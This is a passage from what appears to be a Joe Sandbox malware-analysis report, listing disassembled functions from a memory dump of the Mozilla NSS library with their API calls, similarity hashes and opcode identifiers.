                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Alloc_Util$Arena$Valuefreemalloc
                                                            • String ID:
                                                            • API String ID: 3768380896-0
                                                            • Opcode ID: 39198f9c51757e9f15748f92b3ba34a845d431523e4dca4f62b1b35d6b1be348
                                                            • Instruction ID: 93a896b6b498d04bd9a567c2ab55cc02b4aaf2eca514569b3ea5b691f87864e5
                                                            • Opcode Fuzzy Hash: 39198f9c51757e9f15748f92b3ba34a845d431523e4dca4f62b1b35d6b1be348
                                                            • Instruction Fuzzy Hash: EE817DB5A002059FEB14CF56DD84BAB77F5BF48308F18442CE9159BB51D730E898CBA1
                                                            Function 6CA6CCF0 Relevance: 9.2, APIs: 6, Instructions: 171memorythreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 6CA6C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6CA6DAE2,?), ref: 6CA6C6C2
                                                            • PR_Now.NSS3 ref: 6CA6CD35
                                                              • Part of subcall function 6CAC9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CB10A27), ref: 6CAC9DC6
                                                              • Part of subcall function 6CAC9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CB10A27), ref: 6CAC9DD1
                                                              • Part of subcall function 6CAC9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CAC9DED
                                                              • Part of subcall function 6CA56C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CA01C6F,00000000,00000004,?,?), ref: 6CA56C3F
                                                            • PR_GetCurrentThread.NSS3 ref: 6CA6CD54
                                                              • Part of subcall function 6CAC9BF0: TlsGetValue.KERNEL32(?,?,?,6CB10A75), ref: 6CAC9C07
                                                              • Part of subcall function 6CA57260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CA01CCC,00000000,00000000,?,?), ref: 6CA5729F
                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CA6CD9B
                                                            • PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6CA6CE0B
                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6CA6CE2C
                                                              • Part of subcall function 6CA610C0: TlsGetValue.KERNEL32(?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA610F3
                                                              • Part of subcall function 6CA610C0: EnterCriticalSection.KERNEL32(?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA6110C
                                                              • Part of subcall function 6CA610C0: PL_ArenaAllocate.NSS3(?,?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA61141
                                                              • Part of subcall function 6CA610C0: PR_Unlock.NSS3(?,?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA61182
                                                              • Part of subcall function 6CA610C0: TlsGetValue.KERNEL32(?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA6119C
                                                            • PORT_ArenaMark_Util.NSS3(00000000), ref: 6CA6CE40
                                                              • Part of subcall function 6CA614C0: TlsGetValue.KERNEL32 ref: 6CA614E0
                                                              • Part of subcall function 6CA614C0: EnterCriticalSection.KERNEL32 ref: 6CA614F5
                                                              • Part of subcall function 6CA614C0: PR_Unlock.NSS3 ref: 6CA6150D
                                                              • Part of subcall function 6CA6CEE0: PORT_ArenaMark_Util.NSS3(?,6CA6CD93,?), ref: 6CA6CEEE
                                                              • Part of subcall function 6CA6CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6CA6CD93,?), ref: 6CA6CEFC
                                                              • Part of subcall function 6CA6CEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6CA6CD93,?), ref: 6CA6CF0B
                                                              • Part of subcall function 6CA6CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6CA6CD93,?), ref: 6CA6CF1D
                                                              • Part of subcall function 6CA6CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6CA6CD93,?), ref: 6CA6CF47
                                                              • Part of subcall function 6CA6CEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6CA6CD93,?), ref: 6CA6CF67
                                                              • Part of subcall function 6CA6CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6CA6CD93,?,?,?,?,?,?,?,?,?,?,?,6CA6CD93,?), ref: 6CA6CF78
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
                                                            • String ID:
                                                            • API String ID: 3748922049-0
                                                            • Opcode ID: e0f279bbc63cb904daeee28cb1b1d3012fd451ff38265cd750d6a0f428dbf41d
                                                            • Instruction ID: 4cc09f6403fc06ff1831be9561ca5b43273f3ac5a17d46c9ec1479d4eb138942
                                                            • Opcode Fuzzy Hash: e0f279bbc63cb904daeee28cb1b1d3012fd451ff38265cd750d6a0f428dbf41d
                                                            • Instruction Fuzzy Hash: B451C2B6A001009BEB10DF6ADD40BAA77F4EF4834CF290524D955E7F41EB31E989CB91
                                                            Function 6CA93C80 Relevance: 9.1, APIs: 6, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 6CA95B40: PR_GetIdentitiesLayer.NSS3 ref: 6CA95B56
                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA93D3F
                                                              • Part of subcall function 6CA0BA90: PORT_NewArena_Util.NSS3(00000800,6CA93CAF,?), ref: 6CA0BABF
                                                              • Part of subcall function 6CA0BA90: PORT_ArenaAlloc_Util.NSS3(00000000,00000010,?,6CA93CAF,?), ref: 6CA0BAD5
                                                              • Part of subcall function 6CA0BA90: PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,6CA93CAF,?), ref: 6CA0BB08
                                                              • Part of subcall function 6CA0BA90: memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6CA93CAF,?), ref: 6CA0BB1A
                                                              • Part of subcall function 6CA0BA90: SECITEM_CopyItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,6CA93CAF,?), ref: 6CA0BB3B
                                                            • PR_EnterMonitor.NSS3(?), ref: 6CA93CCB
                                                              • Part of subcall function 6CAC9090: TlsGetValue.KERNEL32 ref: 6CAC90AB
                                                              • Part of subcall function 6CAC9090: TlsGetValue.KERNEL32 ref: 6CAC90C9
                                                              • Part of subcall function 6CAC9090: EnterCriticalSection.KERNEL32 ref: 6CAC90E5
                                                              • Part of subcall function 6CAC9090: TlsGetValue.KERNEL32 ref: 6CAC9116
                                                              • Part of subcall function 6CAC9090: LeaveCriticalSection.KERNEL32 ref: 6CAC913F
                                                            • PR_EnterMonitor.NSS3(?), ref: 6CA93CE2
                                                            • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CA93CF8
                                                            • PR_ExitMonitor.NSS3(?), ref: 6CA93D15
                                                            • PR_ExitMonitor.NSS3(?), ref: 6CA93D2E
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Util$Monitor$EnterValue$Alloc_ArenaArena_CriticalExitSection$CopyErrorFreeIdentitiesItem_LayerLeavememset
                                                            • String ID:
                                                            • API String ID: 4030862364-0
                                                            • Opcode ID: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
                                                            • Instruction ID: e1c2f950c23aedd8e10f2526eaaf6ba2a5a57a669681cd4003ba75e05922c499
                                                            • Opcode Fuzzy Hash: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
                                                            • Instruction Fuzzy Hash: DC1138756226006FE7205E7AFD8279BB2F4AF1120DF000934E45E87B30E632E85DC243
                                                            Function 6CA5FDF0 Relevance: 9.1, APIs: 6, Instructions: 60memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6CA5FE08
                                                              • Part of subcall function 6CA610C0: TlsGetValue.KERNEL32(?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA610F3
                                                              • Part of subcall function 6CA610C0: EnterCriticalSection.KERNEL32(?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA6110C
                                                              • Part of subcall function 6CA610C0: PL_ArenaAllocate.NSS3(?,?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA61141
                                                              • Part of subcall function 6CA610C0: PR_Unlock.NSS3(?,?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA61182
                                                              • Part of subcall function 6CA610C0: TlsGetValue.KERNEL32(?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA6119C
                                                            • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6CA5FE1D
                                                              • Part of subcall function 6CA610C0: PL_ArenaAllocate.NSS3(?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA6116E
                                                            • PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6CA5FE29
                                                            • PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6CA5FE3D
                                                            • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6CA5FE62
                                                            • free.MOZGLUE(00000000,?,?,?,?), ref: 6CA5FE6F
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Alloc_ArenaUtil$AllocateValue$CriticalEnterSectionUnlockfreememcpy
                                                            • String ID:
                                                            • API String ID: 660648399-0
                                                            • Opcode ID: 94df70f4cff47c1feb8259e7a2c3b7c5f23126164867f7c1e4429ad8d954ca1d
                                                            • Instruction ID: ed2d33b2e0b00d8115af380946388b8838f0cb35fe94732f0a11afa64cd3aebb
                                                            • Opcode Fuzzy Hash: 94df70f4cff47c1feb8259e7a2c3b7c5f23126164867f7c1e4429ad8d954ca1d
                                                            • Instruction Fuzzy Hash: B6110CB67012416BEB004F55EC40A5B77A8AF54299F54C03CFD1C87F12E731E9A4C791
                                                            Function 6CB0FD90 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PR_Lock.NSS3 ref: 6CB0FD9E
                                                              • Part of subcall function 6CAC9BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C9F1A48), ref: 6CAC9BB3
                                                              • Part of subcall function 6CAC9BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C9F1A48), ref: 6CAC9BC8
                                                            • PR_WaitCondVar.NSS3(000000FF), ref: 6CB0FDB9
                                                              • Part of subcall function 6C9EA900: TlsGetValue.KERNEL32(00000000,?,6CB614E4,?,6C984DD9), ref: 6C9EA90F
                                                              • Part of subcall function 6C9EA900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6C9EA94F
                                                            • PR_Unlock.NSS3 ref: 6CB0FDD4
                                                            • PR_Lock.NSS3 ref: 6CB0FDF2
                                                            • PR_NotifyAllCondVar.NSS3 ref: 6CB0FE0D
                                                            • PR_Unlock.NSS3 ref: 6CB0FE23
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: CondLockUnlockValue$CriticalEnterNotifySectionWait
                                                            • String ID:
                                                            • API String ID: 3365241057-0
                                                            • Opcode ID: 92cdc08a8c0abe702d9324cc2c775846c2563cedeffbe50c57b6cc500262e148
                                                            • Instruction ID: 685c7917130fcd5d13df367ab8b0db6ee74dc5e1cbad15ef840ffe9494016c7e
                                                            • Opcode Fuzzy Hash: 92cdc08a8c0abe702d9324cc2c775846c2563cedeffbe50c57b6cc500262e148
                                                            • Instruction Fuzzy Hash: F00161B6F05251ABDF058E66FD008557B31FB122687194374E82647BE2EB22DD28CAC2
                                                            Function 6CA4FC30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PL_strncasecmp.NSS3(?,pkcs11:,00000007), ref: 6CA4FC55
                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CA4FCB2
                                                            • PR_SetError.NSS3(FFFFE040,00000000), ref: 6CA4FDB7
                                                            • PR_SetError.NSS3(FFFFE09A,00000000), ref: 6CA4FDDE
                                                              • Part of subcall function 6CA58800: TlsGetValue.KERNEL32(?,6CA6085A,00000000,?,6CA08369,?), ref: 6CA58821
                                                              • Part of subcall function 6CA58800: TlsGetValue.KERNEL32(?,?,6CA6085A,00000000,?,6CA08369,?), ref: 6CA5883D
                                                              • Part of subcall function 6CA58800: EnterCriticalSection.KERNEL32(?,?,?,6CA6085A,00000000,?,6CA08369,?), ref: 6CA58856
                                                              • Part of subcall function 6CA58800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6CA58887
                                                              • Part of subcall function 6CA58800: PR_Unlock.NSS3(?,?,?,?,6CA6085A,00000000,?,6CA08369,?), ref: 6CA58899
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: ErrorValue$CondCriticalEnterL_strncasecmpSectionUnlockWaitstrcmp
                                                            • String ID: pkcs11:
                                                            • API String ID: 362709927-2446828420
                                                            • Opcode ID: 34e777859353a58ad915f11c4b14254e3837345cb565bbcc7bf1f345abdd58d3
                                                            • Instruction ID: 6096bb196a49b0b3ad4974b9719e8440c67913f2d09cf3ce846f0d0e00260775
                                                            • Opcode Fuzzy Hash: 34e777859353a58ad915f11c4b14254e3837345cb565bbcc7bf1f345abdd58d3
                                                            • Instruction Fuzzy Hash: DE5114B1A411119BEB008F69DE40FAA3375EF4035DF58902DDD046BB91EB30E998CBA2
                                                            Function 6C98BDA0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 94COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memcmp.VCRUNTIME140(00000000,?,?), ref: 6C98BE02
                                                              • Part of subcall function 6CAB9C40: memcmp.VCRUNTIME140(?,00000000,6C98C52B), ref: 6CAB9D53
                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014A8E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C98BE9F
                                                            Strings
                                                            • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C98BE89
                                                            • %s at line %d of [%.10s], xrefs: 6C98BE98
                                                            • database corruption, xrefs: 6C98BE93
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: memcmp$sqlite3_log
                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                            • API String ID: 1135338897-598938438
                                                            • Opcode ID: 131e1b790927d22ac2d8751566af17d9752d9a4d95b5266911c53adee557b924
                                                            • Instruction ID: 9cb60e4d14a9b3dcb486642c65f557345d89d38b2953aa46cd37bf1bd8bfd41e
                                                            • Opcode Fuzzy Hash: 131e1b790927d22ac2d8751566af17d9752d9a4d95b5266911c53adee557b924
                                                            • Instruction Fuzzy Hash: AF312531A456A99FC700CF69DC94AAFBBB5AF42314B0D8954EE582BB42D771EC04C7E0
                                                            Function 6C9F0DC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6C9F0BDE), ref: 6C9F0DCB
                                                            • strrchr.VCRUNTIME140(00000000,0000005C,?,6C9F0BDE), ref: 6C9F0DEA
                                                            • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6C9F0BDE), ref: 6C9F0DFC
                                                            • PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6C9F0BDE), ref: 6C9F0E32
                                                            Strings
                                                            • %s incr => %d (find lib), xrefs: 6C9F0E2D
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: strrchr$Print_stricmp
                                                            • String ID: %s incr => %d (find lib)
                                                            • API String ID: 97259331-2309350800
                                                            • Opcode ID: 589f240b66d80c28d51d9264a9ee934ce3c94a67e64d592b1a483faced34f9fc
                                                            • Instruction ID: 623d835db509ac9c9d5304b0ce9d8f3e69d48ef8b57f373f62858ac2b47d5118
                                                            • Opcode Fuzzy Hash: 589f240b66d80c28d51d9264a9ee934ce3c94a67e64d592b1a483faced34f9fc
                                                            • Instruction Fuzzy Hash: 970124727002509FE7208F25DC49E2B73ADDB45A08B05442DE909D3A81E761FC1587E1
                                                            Function 6C999C60 Relevance: 7.8, APIs: 6, Instructions: 262COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(?), ref: 6C999CF2
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 6C999D45
                                                            • EnterCriticalSection.KERNEL32(?), ref: 6C999D8B
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 6C999DDE
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$EnterLeave
                                                            • String ID:
                                                            • API String ID: 3168844106-0
                                                            • Opcode ID: 11d2bf2c1818b0c68c5086cfb660dd8db5d159c6c0bf94ed12b8234d98c347fc
                                                            • Instruction ID: 0edd3fd3bb0f4245d2bd5c1661000669b941ccd2fcf7935fb877318b046214fb
                                                            • Opcode Fuzzy Hash: 11d2bf2c1818b0c68c5086cfb660dd8db5d159c6c0bf94ed12b8234d98c347fc
                                                            • Instruction Fuzzy Hash: 39A18C31B055408FEB08EF65D99977E377DAB47715F1D012CE40A47A80DB3AE846CB92
                                                            Function 6CAADD70 Relevance: 7.7, APIs: 5, Instructions: 179COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • TlsGetValue.KERNEL32 ref: 6CAADD8C
                                                            • LeaveCriticalSection.KERNEL32(00000000), ref: 6CAADDB4
                                                            • LeaveCriticalSection.KERNEL32(00000000), ref: 6CAADE1B
                                                            • ReleaseSemaphore.KERNEL32(?,00000001,00000000), ref: 6CAADE77
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: CriticalLeaveSection$ReleaseSemaphoreValue
                                                            • String ID:
                                                            • API String ID: 2700453212-0
                                                            • Opcode ID: ec51785222a6ddb29a50e07f272086240ce99c02c97b2c49c60435e4ed2c4459
                                                            • Instruction ID: 0e2d657ea8cac4faced5684a15b655e153a6b433e2d5ea1898cd3a6e273fe2cc
                                                            • Opcode Fuzzy Hash: ec51785222a6ddb29a50e07f272086240ce99c02c97b2c49c60435e4ed2c4459
                                                            • Instruction Fuzzy Hash: 24715371E00314CBDB20CF9AC58069EB7B5BF49718F29816DDD996B702D730A986CF80
                                                            Function 6CA2BE90 Relevance: 7.6, APIs: 5, Instructions: 141COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SEC_ASN1EncodeItem_Util.NSS3(00000000,00000000,?,?), ref: 6CA2BF06
                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CA2BF56
                                                            • PR_SetError.NSS3(FFFFE005,00000000,?,?,6CA09F71,?,?,00000000), ref: 6CA2BF7F
                                                            • CERT_DestroyCertificate.NSS3(00000000), ref: 6CA2BFA9
                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CA2C014
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Item_Util$Zfree$CertificateDestroyEncodeError
                                                            • String ID:
                                                            • API String ID: 3689625208-0
                                                            • Opcode ID: 07ea8e3d13e771470e768bc7703b1103fef0a8cceb164188cd2776963d19c3b9
